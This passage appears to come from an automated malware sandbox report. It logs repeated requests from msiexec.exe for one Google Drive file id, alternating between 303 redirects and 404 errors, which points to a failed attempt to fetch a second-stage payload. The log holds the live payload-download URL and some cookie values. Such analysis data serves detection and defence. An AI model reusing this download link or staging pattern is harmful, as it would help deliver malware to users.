                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.1149983142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:04 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:04 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgSSlXKP8L-8uIF3KR10TwURCJYTf2ZHs-yXQ1Y6X0TGqiFPcMD5Zg1AautT6eWBMfTS
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:04 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-PATuXIzGV7I8EryN1XbpKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 78 6f 4e 56 52 54 59 4f 72 71 66 59 35 74 42 62 6e 68 67 45 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LxoNVRTYOrqfY5tBbnhgEA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.1149984142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:05 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:05 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:05 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-Jz3Ridc61Pkb6ur1BuyWbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.1149985142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:06 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:06 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgS_7we_Jgz9SeK2_mqLiIIIfmf2FNi-7YaDwpEywJm3MjTx1fsQx0Gyo7vK5vraXFiZ
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:06 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-MOuZkqASuH69hcgn4wPVag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 54 46 79 36 56 66 64 42 75 57 70 45 66 48 4d 4a 63 65 62 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hTFy6VfdBuWpEfHMJceb0w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.1149986142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:07 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:08 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:08 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-px9zaahxD4tRJNWUcwtEnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.1149987142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:08 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:09 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQejWijWPmdtqOOVevx0VQqlRNRrLb48Tbrt1BoftBF-dXawOk8aphvyqEjBbtSrzffb37go3c
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:09 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-1RuAlN_AFEj93_ri0aLb0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 4b 36 35 4b 75 37 2d 73 78 74 6d 55 74 76 58 67 69 6a 35 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HK65Ku7-sxtmUtvXgij5cw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.1149988142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:10 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:10 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:10 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-2K6Sa4QFUI9GEgJ2qfg8Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.1149989142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:11 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:11 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQ-7sPfPJgZ8UglhXntAPa-4FEl7_qqnxhXP4nJWpIA8ZXhg22qloNRWoLXZoGBVGu5nJKN8iQ
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:11 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-txyYCFHWlemBgCO_s4WLRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 4d 65 48 47 34 31 62 52 39 36 63 52 73 61 32 36 67 39 61 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1MeHG41bR96cRsa26g9aug">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.1149990142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:12 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:12 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:12 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
